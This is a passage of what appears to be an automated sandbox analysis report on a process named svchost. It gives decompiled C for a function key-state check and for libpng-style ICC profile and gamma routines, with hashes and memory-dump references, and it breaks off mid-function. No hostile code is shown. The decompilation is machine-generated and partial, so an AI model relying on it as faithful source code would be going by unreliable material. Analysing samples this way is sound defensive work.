    • GetKeyState.USER32(00000012), ref: 0041F0DB
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: State
    • String ID:
    • API String ID: 1649606143-0
    • Opcode ID: 70863139ccc34d4c811373eecc736c55601ca5eb3a0a1843d03fde3624c567c5
    • Instruction ID: 6c69a81168a4cfbcabce5ed21a98cb28dea9316d92e4d113119c82242428f6b5
    • Opcode Fuzzy Hash: 70863139ccc34d4c811373eecc736c55601ca5eb3a0a1843d03fde3624c567c5
    • Instruction Fuzzy Hash: 0301AD3FD0466A46EB2422649908BF65D810B58B54F6A8077C94D37283858C0CCF27AF
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048837D Relevance: 4.5, APIs: 3, Instructions: 29keyboardCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0048837D(intOrPtr _a4) {
				intOrPtr _t6;
				void* _t13;

				_t6 = _a4;
				if( *((intOrPtr*)(_t6 + 4)) != 0x100 ||  *((intOrPtr*)(_t6 + 8)) != 0x70 || ( *(_t6 + 0xc) >> 0x00000010 & 0x00000040) != 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					return 0;
				} else {
					_t13 = 1;
					return _t13;
				}
			}





    0x0048837d
    0x00488389
    0x00000000
    0x004883bd
    0x004883bf
    0x00000000
    0x004883bf

    APIs
    • GetKeyState.USER32(00000010), ref: 004883A4
    • GetKeyState.USER32(00000011), ref: 004883AD
    • GetKeyState.USER32(00000012), ref: 004883B6
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: State
    • String ID:
    • API String ID: 1649606143-0
    • Opcode ID: 132e2153a714cf300b26e85cb71834d269290b094b34fbcccaf30a9ffab9a0d0
    • Instruction ID: c772513ff8791ed6301aaa190c15da40e7a5fa6c4147ecc743e7c35a14e57963
    • Opcode Fuzzy Hash: 132e2153a714cf300b26e85cb71834d269290b094b34fbcccaf30a9ffab9a0d0
    • Instruction Fuzzy Hash: 90E09B357012599DEB40F2408900FDD76916F30F90FC4EC6FEE84BB191CEA98C529769
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00440F70 Relevance: 4.0, Strings: 3, Instructions: 200COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 43%
    			E00440F70() {
				intOrPtr _t89;
				void* _t90;
				intOrPtr _t91;
				intOrPtr* _t98;
				signed int _t153;
				intOrPtr _t160;
				signed int _t162;
				void* _t163;
				void* _t170;

				_t160 =  *((intOrPtr*)(_t170 + 0x1c));
				_t153 = 0;
				_t163 = 0x10000;
				 *((intOrPtr*)(_t170 + 0x10)) = 0;
				 *(_t170 + 0x14) = 0;
				_t98 = 0x497b78;
				do {
					_t8 = _t98 - 4; // 0x29f83dde
					if(0xbadbad !=  *_t8 || 0xbadbad !=  *_t98) {
						goto L17;
					} else {
						_t17 = _t98 + 4; // 0x7842fae4
						if(0xbadbad !=  *_t17) {
							goto L17;
						} else {
							_t22 = _t98 + 8; // 0xca83390d
							if(0xbadbad !=  *_t22) {
								goto L17;
							} else {
								if(_t153 == 0) {
									_t153 = 0xbadbad;
									_t163 = 0xbadbad;
								}
								_t30 = _t98 - 8; // 0xbe8
								if(_t153 !=  *_t30 || _t163 != 0) {
									L15:
									_t40 = _t98 + 0xc; // 0x1
									if( *_t40 != 0) {
										E00449710( *((intOrPtr*)(_t170 + 0x1c)), "copyright violation: edited ICC profile ignored");
										_t170 = _t170 + 8;
									}
									goto L17;
								} else {
									if( *((intOrPtr*)(_t170 + 0x24)) == 0) {
										_push(0);
										_push(0);
										_push(0);
										_t90 = E00465040();
										_push(_t153);
										_push(_t160);
										_push(_t90);
										_t91 = E00465040();
										_t170 = _t170 + 0x18;
										 *((intOrPtr*)(_t170 + 0x24)) = _t91;
									}
									_t35 = _t98 - 0x10; // 0xa3fd9f6
									if( *((intOrPtr*)(_t170 + 0x24)) !=  *_t35) {
										goto L15;
									} else {
										if( *((intOrPtr*)(_t170 + 0x10)) == 0) {
											_t89 = E00449F00(E00449F00(0, 0, 0), _t160, _t153);
											_t170 = _t170 + 0x18;
											 *((intOrPtr*)(_t170 + 0x10)) = _t89;
										}
										_t39 = _t98 - 0xc; // 0x3b8772b9
										if( *((intOrPtr*)(_t170 + 0x10)) ==  *_t39) {
											_t162 =  *(_t170 + 0x14) << 5;
											if( *((intOrPtr*)(_t162 + 0x497b85)) == 0) {
												if( *((intOrPtr*)(_t162 + 0x497b84)) == 0) {
													_push(0);
													_push("out-of-date sRGB profile with no signature");
													_push( *((intOrPtr*)(_t170 + 0x1c)));
													goto L23;
												}
											} else {
												_push(2);
												_push("known incorrect sRGB profile");
												_push( *((intOrPtr*)(_t170 + 0x1c)));
												L23:
												E00449970();
											}
											return 1;
										} else {
											goto L15;
										}
									}
								}
							}
						}
					}
					L25:
					L17:
					_t98 = _t98 + 0x20;
					 *(_t170 + 0x14) =  *(_t170 + 0x14) + 1;
				} while (_t98 < 0x497c58);
				return 0;
				goto L25;
			}












    0x00440f76
    0x00440f7b
    0x00440f7d
    0x00440f82
    0x00440f86
    0x00440f8a
    0x00440f8f
    0x00440fb2
    0x00440fb7
    0x00000000
    0x00440fea
    0x00441008
    0x00441012
    0x00000000
    0x00441018
    0x0044103b
    0x00441040
    0x00000000
    0x00441046
    0x00441048
    0x00441080
    0x00441091
    0x00441091
    0x00441093
    0x00441096
    0x004410fc
    0x004410fc
    0x00441101
    0x0044110d
    0x00441112
    0x00441112
    0x00000000
    0x004410a2
    0x004410a8
    0x004410aa
    0x004410ac
    0x004410ae
    0x004410b0
    0x004410b5
    0x004410b6
    0x004410b7
    0x004410b8
    0x004410bd
    0x004410c0
    0x004410c0
    0x004410c8
    0x004410cd
    0x00000000
    0x004410cf
    0x004410d5
    0x004410e5
    0x004410ea
    0x004410ed
    0x004410ed
    0x004410f5
    0x004410fa
    0x0044113b
    0x00441146
    0x0044115e
    0x00441164
    0x00441166
    0x0044116b
    0x00000000
    0x0044116b
    0x00441148
    0x0044114c
    0x0044114e
    0x00441153
    0x0044116c
    0x0044116c
    0x00441171
    0x00441184
    0x00000000
    0x00000000
    0x00000000
    0x004410fa
    0x004410cd
    0x00441096
    0x00441040
    0x00441012
    0x00000000
    0x00441115
    0x00441119
    0x00441123
    0x00441123
    0x00441136
    0x00000000

    Strings
    • out-of-date sRGB profile with no signature, xrefs: 00441166
    • copyright violation: edited ICC profile ignored, xrefs: 00441107
    • known incorrect sRGB profile, xrefs: 0044114E
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: copyright violation: edited ICC profile ignored$known incorrect sRGB profile$out-of-date sRGB profile with no signature
    • API String ID: 0-1307623137
    • Opcode ID: e54c6f50ef10afe629bd2b2fbc276af7dff5a9f5fb71393feda3a81690ea2d4c
    • Instruction ID: 832bd9d3fd13058db5d6e847f2b99050423461b42284168bca8ed6be1759e45b
    • Opcode Fuzzy Hash: e54c6f50ef10afe629bd2b2fbc276af7dff5a9f5fb71393feda3a81690ea2d4c
    • Instruction Fuzzy Hash: 595128B270C7910BEB28CE394C5176BBBE25FC9305F09886DE5D6C7702E568E909C768
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0044EED0 Relevance: 3.3, Strings: 2, Instructions: 788COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 74%
    			E0044EED0(void* __fp0) {
				signed int _t332;
				signed int _t333;
				signed char _t334;
				signed int _t335;
				void* _t337;
				signed char _t338;
				intOrPtr* _t341;
				signed int _t343;
				signed char _t344;
				intOrPtr _t345;
				intOrPtr _t346;
				intOrPtr _t347;
				intOrPtr _t348;
				signed char _t350;
				signed int _t351;
				signed int _t356;
				signed int _t358;
				short _t370;
				short _t371;
				signed int _t372;
				short _t375;
				signed int _t378;
				signed int _t379;
				signed int _t382;
				signed int _t383;
				signed int _t391;
				signed int _t393;
				signed char _t394;
				char _t439;
				char _t443;
				char _t444;
				signed int _t448;
				signed int _t452;
				intOrPtr _t457;
				signed char* _t459;
				void* _t460;
				void* _t461;
				void* _t463;
				void* _t464;
				void* _t466;
				void* _t467;
				signed int _t485;
				signed int _t494;
				signed int _t495;
				signed int _t496;
				void* _t502;
				signed int _t503;
				signed int _t504;
				signed int _t526;
				signed int _t529;
				signed int _t540;
				signed int _t543;
				signed int _t550;
				signed char _t563;
				signed int _t564;
				signed int _t568;
				signed int _t572;
				signed int _t579;
				signed int _t582;
				intOrPtr* _t584;
				void* _t590;
				void* _t591;
				signed int _t618;
				intOrPtr* _t646;
				signed char _t648;
				signed int _t655;
				intOrPtr _t658;
				void* _t659;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				void* _t668;
				intOrPtr _t685;
				intOrPtr _t688;
				signed int _t689;
				intOrPtr _t702;
				intOrPtr _t704;
				void* _t714;
				void* _t715;
				void* _t716;
				void* _t717;
				void* _t718;
				void* _t720;

				_t778 = __fp0;
				_t685 =  *((intOrPtr*)(_t714 + 0x1c));
				_t655 = 0;
				_t332 =  *(_t685 + 0x2dc);
				if(_t332 == 0) {
					_t333 =  *(_t685 + 0x18c);
					__eflags = _t333;
					if(__eflags == 0) {
						 *(_t685 + 0x2dc) = 0x186a0;
						 *(_t685 + 0x18c) = 0x186a0;
					} else {
						_push(_t333);
						_t494 = E004417B0(__eflags, __fp0);
						_t714 = _t714 + 4;
						 *(_t685 + 0x2dc) = _t494;
					}
				} else {
					_t582 =  *(_t685 + 0x18c);
					_t722 = _t582;
					if(_t582 == 0) {
						_push(_t332);
						_t495 = E004417B0(__eflags, __fp0);
						_t714 = _t714 + 4;
						 *(_t685 + 0x18c) = _t495;
					} else {
						_t496 = E0044F9F0(_t722, __fp0, _t332, _t582);
						_t714 = _t714 + 8;
						_t655 = _t496;
					}
				}
				 *(_t685 + 0x326) =  *(_t685 + 0x326) | 0x00000001;
				_t334 =  *(_t685 + 0x7c);
				if(_t655 == 0) {
					_t335 = _t334 & 0xffffdfff;
					__eflags = _t335;
				} else {
					_t335 = _t334 | 0x00000020;
				}
				 *(_t685 + 0x7c) = _t335;
				if((_t335 & 0x00040000) != 0 && (0x00000080 & _t335) == 0) {
					 *((short*)(_t685 + 0x150)) = 0;
					 *(_t685 + 0x7c) = _t335 & 0xfd7ffeff;
					 *(_t685 + 0x78) =  *(_t685 + 0x78) & 0xffffdfff;
				}
				_t337 = E00441800( *(_t685 + 0x18c));
				_t715 = _t714 + 4;
				if(_t337 == 0) {
					 *(_t685 + 0x7c) =  *(_t685 + 0x7c) & 0xff7fffff;
					 *(_t685 + 0x78) =  *(_t685 + 0x78) & 0xffffdfff;
				}
				if(( *(_t685 + 0x7c) & 0x00600000) != 0) {
					E00441190(_t778, _t685);
					_t715 = _t715 + 4;
				}
				_t338 =  *(_t685 + 0x7c);
				if((_t338 & 0x00000001) == 0) {
					__eflags = 0x00000080 & _t338;
					if((0x00000080 & _t338) != 0) {
						__eflags = _t338 & 0x00000040;
						if((_t338 & 0x00000040) != 0) {
							_t485 =  *(_t685 + 0x16a);
							__eflags = _t485 -  *(_t685 + 0x16c);
							if(_t485 ==  *(_t685 + 0x16c)) {
								__eflags = _t485 -  *(_t685 + 0x16e);
								if(_t485 ==  *(_t685 + 0x16e)) {
									 *(_t685 + 0x170) = _t485;
									_t579 =  *(_t685 + 0x74) | 0x00000008;
									__eflags = _t579;
									 *(_t685 + 0x74) = _t579;
								}
							}
						}
					}
				} else {
					if(( *(_t685 + 0x157) & 0x00000002) == 0) {
						 *(_t685 + 0x74) =  *(_t685 + 0x74) | 0x00000008;
					}
				}
				_push(_t685);
				if( *(_t685 + 0x157) != 3) {
					E0044FB20();
				} else {
					E0044FA30();
				}
				_t529 =  *(_t685 + 0x7c);
				_t716 = _t715 + 4;
				if((_t529 & 0x00000002) != 0 && (0x00000080 & _t529) != 0 && (_t529 & 0x00000001) == 0 &&  *((intOrPtr*)(_t685 + 0x158)) != 0x10) {
					 *(_t685 + 0x16a) = 0xbadb2c >> 0x10;
					 *(_t685 + 0x16c) = 0xbadb2c >> 0x10;
					 *(_t685 + 0x16e) = 0xbadb2c >> 0x10;
					 *(_t685 + 0x170) = 0xbadb2c >> 0x10;
				}
				if((_t529 & 0x04000400) != 0 && (0x00000080 & _t529) != 0 && (_t529 & 0x00000001) == 0 &&  *((intOrPtr*)(_t685 + 0x158)) == 0x10) {
					 *(_t685 + 0x16a) =  *(_t685 + 0x16a) * 0x101;
					 *(_t685 + 0x16c) =  *(_t685 + 0x16c) * 0x101;
					 *(_t685 + 0x16e) =  *(_t685 + 0x16e) * 0x101;
					 *(_t685 + 0x170) =  *(_t685 + 0x170) * 0x101;
				}
				_t584 = _t685 + 0x168;
				_t341 = _t685 + 0x172;
				 *_t341 =  *_t584;
				 *((intOrPtr*)(_t341 + 4)) =  *((intOrPtr*)(_t584 + 4));
				 *((short*)(_t341 + 8)) =  *((intOrPtr*)(_t584 + 8));
				if((_t529 & 0x00000020) != 0) {
					L59:
					E00441AC0(_t778, _t685, 0);
					_t343 =  *(_t685 + 0x7c);
					_t717 = _t716 + 8;
					__eflags = 0x00000080 & _t343;
					if((0x00000080 & _t343) == 0) {
						__eflags =  *(_t685 + 0x157) - 3;
						if( *(_t685 + 0x157) != 3) {
							goto L118;
						}
						__eflags = _t343 & 0x00000010;
						if((_t343 & 0x00000010) == 0) {
							L113:
							_t348 =  *((intOrPtr*)(_t685 + 0x144));
							_t540 =  *((intOrPtr*)(_t685 + 0x148));
							__eflags = 0;
							if(0 <= 0) {
								L116:
								_t350 =  *(_t685 + 0x7c) & 0xffffdfff;
								__eflags = _t350;
								goto L117;
							}
							_t351 = _t348 + 2;
							__eflags = _t351;
							do {
								_t351 = _t351 + 3;
								 *((char*)(_t351 - 5)) =  *((intOrPtr*)(0 +  *((intOrPtr*)(_t685 + 0x190))));
								 *((char*)(_t351 - 4)) =  *((intOrPtr*)(0 +  *((intOrPtr*)(_t685 + 0x190))));
								_t540 = _t540 - 1;
								__eflags = _t540;
								 *((char*)(_t351 - 3)) =  *((intOrPtr*)(0 +  *((intOrPtr*)(_t685 + 0x190))));
							} while (_t540 != 0);
							goto L116;
						}
						__eflags = _t343 & 0x00600000;
						if((_t343 & 0x00600000) != 0) {
							goto L118;
						}
						goto L113;
					}
					__eflags = _t343 & 0x00600000;
					if((_t343 & 0x00600000) != 0) {
						E004496C0(_t685, "libpng does not support gamma+background+rgb_to_gray");
						_t717 = _t717 + 8;
					}
					__eflags =  *(_t685 + 0x157) - 3;
					if( *(_t685 + 0x157) != 3) {
						_t663 = 0x186a0;
						_t689 = 0x186a0;
						__eflags = 0xffffffffffffffff;
						if(0xffffffffffffffff == 0) {
							_t663 =  *(_t685 + 0x18c);
						} else {
							__eflags = 0xffffffffffffffff;
							if(0xffffffffffffffff == 0) {
								_push( *(_t685 + 0x2dc));
								_t378 = E004417B0(0xffffffffffffffff, _t778);
								_push( *(_t685 + 0x18c));
								_push( *(_t685 + 0x2dc));
								_t663 = _t378;
								_t379 = E00441820(_t378, __eflags, _t778);
								_t717 = _t717 + 0xc;
								_t689 = _t379;
							} else {
								__eflags = 0xfffffffffffffffd;
								if(0xfffffffffffffffd == 0) {
									_push( *((intOrPtr*)(_t685 + 0x164)));
									_t382 = E004417B0(0xfffffffffffffffd, _t778);
									_push( *(_t685 + 0x18c));
									_push( *((intOrPtr*)(_t685 + 0x164)));
									_t663 = _t382;
									_t383 = E00441820(_t382, __eflags, _t778);
									_t717 = _t717 + 0xc;
									_t689 = _t383;
								} else {
									E00449530(_t685, "invalid background gamma type");
									_t717 = _t717 + 8;
								}
							}
						}
						_t503 = E00441800(_t663);
						_t356 = E00441800(_t689);
						_t718 = _t717 + 8;
						 *(_t718 + 0x20) = _t356;
						__eflags = _t503;
						if(_t503 != 0) {
							__eflags = 0;
							_t375 = E00441930(_t685, 0, _t663);
							_t718 = _t718 + 0xc;
							 *((short*)(_t685 + 0x17a)) = _t375;
						}
						__eflags =  *(_t718 + 0x20);
						if( *(_t718 + 0x20) != 0) {
							__eflags = 0;
							_t372 = E00441930(_t685, 0, _t689);
							_t718 = _t718 + 0xc;
							 *(_t685 + 0x170) = _t372;
						}
						_t358 =  *(_t685 + 0x16a);
						__eflags = _t358 -  *(_t685 + 0x16c);
						if(_t358 !=  *(_t685 + 0x16c)) {
							L105:
							__eflags = _t503;
							if(_t503 != 0) {
								 *((short*)(_t685 + 0x174)) = E00441930(_t685, _t358 & 0x0000ffff, _t663);
								 *((short*)(_t685 + 0x176)) = E00441930(_t685, 0, _t663);
								__eflags = 0;
								_t370 = E00441930(_t685, 0, _t663);
								_t718 = _t718 + 0x24;
								 *((short*)(_t685 + 0x178)) = _t370;
							}
							__eflags =  *(_t718 + 0x20);
							if( *(_t718 + 0x20) != 0) {
								 *(_t685 + 0x16a) = E00441930(_t685, 0, _t689);
								 *(_t685 + 0x16c) = E00441930(_t685, 0, _t689);
								__eflags = 0;
								 *(_t685 + 0x16e) = E00441930(_t685, 0, _t689);
							}
							 *((char*)(_t685 + 0x162)) = 1;
						} else {
							__eflags = _t358 -  *(_t685 + 0x16e);
							if(_t358 !=  *(_t685 + 0x16e)) {
								goto L105;
							}
							_t543 =  *(_t685 + 0x170);
							__eflags = _t358 - _t543;
							if(_t358 != _t543) {
								goto L105;
							}
							_t371 =  *((intOrPtr*)(_t685 + 0x17a));
							 *(_t685 + 0x16e) = _t543;
							 *((short*)(_t685 + 0x178)) = _t371;
							 *((short*)(_t685 + 0x176)) = _t371;
							 *((short*)(_t685 + 0x174)) = _t371;
							 *(_t685 + 0x16c) = _t543;
							 *(_t685 + 0x16a) = _t543;
							 *((char*)(_t685 + 0x162)) = 1;
						}
						goto L118;
					} else {
						 *((intOrPtr*)(_t717 + 0x18)) =  *((intOrPtr*)(_t685 + 0x144));
						 *(_t717 + 0x14) = 0;
						__eflags =  *((intOrPtr*)(_t685 + 0x162)) - 2;
						if( *((intOrPtr*)(_t685 + 0x162)) != 2) {
							__eflags = 0;
							if(0 == 0) {
								_t664 =  *(_t685 + 0x18c);
								L72:
								_t504 = 0x186a0;
								L73:
								_t391 = E00441800(_t504);
								_t720 = _t717 + 4;
								__eflags = _t391;
								if(_t391 == 0) {
									 *((char*)(_t720 + 0x20)) =  *(_t685 + 0x16a);
									 *((char*)(_t720 + 0x21)) =  *(_t685 + 0x16c);
									 *((char*)(_t720 + 0x22)) =  *(_t685 + 0x16e);
								} else {
									_push(_t504);
									 *((char*)(_t720 + 0x28)) = E00441870( *(_t685 + 0x16a), _t778, 0);
									_push(_t504);
									_t443 = E00441870( *(_t685 + 0x16a), _t778, 0);
									_push(_t504);
									 *((char*)(_t720 + 0x35)) = _t443;
									_t444 = E00441870( *(_t685 + 0x16a), _t778, 0);
									_t720 = _t720 + 0x18;
									 *((char*)(_t720 + 0x22)) = _t444;
								}
								_t393 = E00441800(_t664);
								_t717 = _t720 + 4;
								__eflags = _t393;
								if(_t393 == 0) {
									_t394 =  *(_t685 + 0x16e);
									 *(_t717 + 0x11) =  *(_t685 + 0x16c);
								} else {
									_push(_t664);
									E00441870( *(_t685 + 0x16a), _t778, 0);
									_push(_t664);
									_t439 = E00441870( *(_t685 + 0x16a), _t778, 0);
									_push(_t664);
									 *((char*)(_t717 + 0x25)) = _t439;
									_t394 = E00441870( *(_t685 + 0x16a), _t778, 0);
									_t717 = _t717 + 0x18;
								}
								 *(_t717 + 0x12) = _t394;
								L80:
								_t665 = 0;
								__eflags =  *(_t717 + 0x14);
								if( *(_t717 + 0x14) <= 0) {
									L89:
									_t350 =  *(_t685 + 0x7c) & 0xffffdf7f;
									goto L117;
								}
								_t550 =  *((intOrPtr*)(_t717 + 0x18)) + 2;
								__eflags = _t550;
								do {
									__eflags = _t665;
									if(_t665 >= 0) {
										L87:
										 *((char*)(_t550 - 2)) =  *((intOrPtr*)(0 +  *((intOrPtr*)(_t685 + 0x190))));
										__eflags = 0;
										 *((char*)(_t550 - 1)) =  *((intOrPtr*)(0 +  *((intOrPtr*)(_t685 + 0x190))));
										 *_t550 =  *((intOrPtr*)(0 +  *((intOrPtr*)(_t685 + 0x190))));
										goto L88;
									}
									_t618 =  *( *((intOrPtr*)(_t685 + 0x1b4)) + _t665);
									__eflags = _t618 - 0xff;
									if(_t618 == 0xff) {
										goto L87;
									}
									__eflags = _t618;
									if(_t618 != 0) {
										 *((char*)(_t550 - 2)) =  *((intOrPtr*)(0xad +  *((intOrPtr*)(_t685 + 0x198))));
										 *((char*)(_t550 - 1)) =  *((intOrPtr*)((((0 * ( *( *((intOrPtr*)(_t685 + 0x1b4)) + _t665) & 0x000000ff) + (0x000000ff - ( *( *((intOrPtr*)(_t685 + 0x1b4)) + _t665) & 0x000000ff)) * ( *(_t717 + 0x11) & 0x000000ff) + 0x00000080 & 0x0000ffff) >> 0x00000008) + (0 * ( *( *((intOrPtr*)(_t685 + 0x1b4)) + _t665) & 0x000000ff) + (0x000000ff - ( *( *((intOrPtr*)(_t685 + 0x1b4)) + _t665) & 0x000000ff)) * ( *(_t717 + 0x11) & 0x000000ff) + 0x00000080 & 0x0000ffff) >> 0x00000008 & 0x000000ff) +  *((intOrPtr*)(_t685 + 0x198))));
										 *_t550 =  *((intOrPtr*)((((0 * ( *( *((intOrPtr*)(_t685 + 0x1b4)) + _t665) & 0x000000ff) + (0x000000ff - ( *( *((intOrPtr*)(_t685 + 0x1b4)) + _t665) & 0x000000ff)) * ( *(_t717 + 0x12) & 0x000000ff) + 0x00000080 & 0x0000ffff) >> 0x00000008) + (0 * ( *( *((intOrPtr*)(_t685 + 0x1b4)) + _t665) & 0x000000ff) + (0x000000ff - ( *( *((intOrPtr*)(_t685 + 0x1b4)) + _t665) & 0x000000ff)) * ( *(_t717 + 0x12) & 0x000000ff) + 0x00000080 & 0x0000ffff) >> 0x00000008 & 0x000000ff) +  *((intOrPtr*)(_t685 + 0x198))));
									} else {
										 *((short*)(_t550 - 2)) =  *((intOrPtr*)(_t717 + 0x20));
										 *((char*)(_t550 - 2 + 2)) =  *((intOrPtr*)(_t717 + 0x22));
									}
									L88:
									_t665 = _t665 + 1;
									_t550 = _t550 + 3;
									__eflags = _t665 -  *(_t717 + 0x14);
								} while (_t665 <  *(_t717 + 0x14));
								goto L89;
							}
							__eflags = 0;
							if(0 == 0) {
								_push( *(_t685 + 0x2dc));
								_t664 = E004417B0(0, _t778);
								_push( *(_t685 + 0x18c));
								_push( *(_t685 + 0x2dc));
								_t448 = E00441820( *(_t685 + 0x18c), __eflags, _t778);
								_t717 = _t717 + 0xc;
								_t504 = _t448;
								goto L73;
							}
							__eflags = 0xfffffffffffffffd;
							if(0xfffffffffffffffd == 0) {
								_push( *((intOrPtr*)(_t685 + 0x164)));
								_t664 = E004417B0(0xfffffffffffffffd, _t778);
								_push( *(_t685 + 0x18c));
								_push( *((intOrPtr*)(_t685 + 0x164)));
								_t452 = E00441820( *(_t685 + 0x18c), __eflags, _t778);
								_t717 = _t717 + 0xc;
								_t504 = _t452;
								goto L73;
							}
							_t664 = 0x186a0;
							goto L72;
						}
						_t702 =  *((intOrPtr*)(_t685 + 0x190));
						 *((char*)(_t717 + 0x20)) =  *((intOrPtr*)(0 + _t702));
						 *((char*)(_t717 + 0x21)) =  *((intOrPtr*)(0 + _t702));
						 *((char*)(_t717 + 0x22)) =  *((intOrPtr*)(0 + _t702));
						_t646 =  *((intOrPtr*)(_t685 + 0x19c));
						 *(_t717 + 0x11) =  *_t646;
						 *(_t717 + 0x12) =  *_t646;
						goto L80;
					}
				} else {
					if((_t529 & 0x00600000) == 0) {
						L42:
						if(( *(_t685 + 0x7c) & 0x00000080) == 0) {
							L47:
							if(( *(_t685 + 0x7c) & 0x00800000) == 0) {
								L49:
								if(( *(_t685 + 0x7c) & 0x00000080) == 0 ||  *(_t685 + 0x157) != 3) {
									L118:
									_t344 =  *(_t685 + 0x7c);
									if((_t344 & 0x00000008) == 0 || (_t344 & 0x00000010) != 0 ||  *(_t685 + 0x157) != 3) {
										L136:
										return _t344;
									} else {
										_t688 =  *((intOrPtr*)(_t685 + 0x148));
										_t344 = _t344 & 0x000000f7;
										 *(_t685 + 0x7c) = _t344;
										if(8 <= 0 || 8 >= 8 || 0 <= 0) {
											L126:
											if(8 <= 0 || 8 >= 8 || _t688 <= 0) {
												L131:
												if(8 > 0 && 8 < 8 && _t688 > 0) {
													_t590 = 0;
													do {
														_t345 =  *((intOrPtr*)(_t685 + 0x144));
														 *(_t590 + _t345 + 2) =  *(_t590 + _t345 + 2) >> 8;
														_t331 = _t345 + 2; // 0x2
														_t344 = _t590 + _t331;
														_t590 = _t590 + 3;
														_t688 = _t688 - 1;
													} while (_t688 != 0);
												}
												goto L136;
											} else {
												_t591 = 0;
												_t658 = _t688;
												do {
													_t346 =  *((intOrPtr*)(_t685 + 0x144));
													 *(_t591 + _t346 + 1) =  *(_t591 + _t346 + 1) >> 8;
													_t323 = _t346 + 1; // 0x1
													_t344 = _t591 + _t323;
													_t591 = _t591 + 3;
													_t658 = _t658 - 1;
												} while (_t658 != 0);
												goto L131;
											}
										} else {
											_t659 = 0;
											_t502 = 0;
											do {
												_t347 =  *((intOrPtr*)(_t685 + 0x144));
												 *(_t347 + _t659) =  *(_t347 + _t659) >> 8;
												_t344 = _t347 + _t659;
												_t659 = _t659 + 3;
												_t502 = _t502 - 1;
											} while (_t502 != 0);
											goto L126;
										}
									}
								} else {
									_t457 =  *((intOrPtr*)(_t685 + 0x144));
									_t704 =  *((intOrPtr*)(_t685 + 0x150));
									_t668 = 0;
									 *(_t716 + 0x21) =  *(_t685 + 0x16c);
									_t648 =  *(_t685 + 0x16e);
									 *((intOrPtr*)(_t716 + 0x14)) = 0;
									 *(_t716 + 0x20) =  *(_t685 + 0x16a);
									if(0 <= 0) {
										L58:
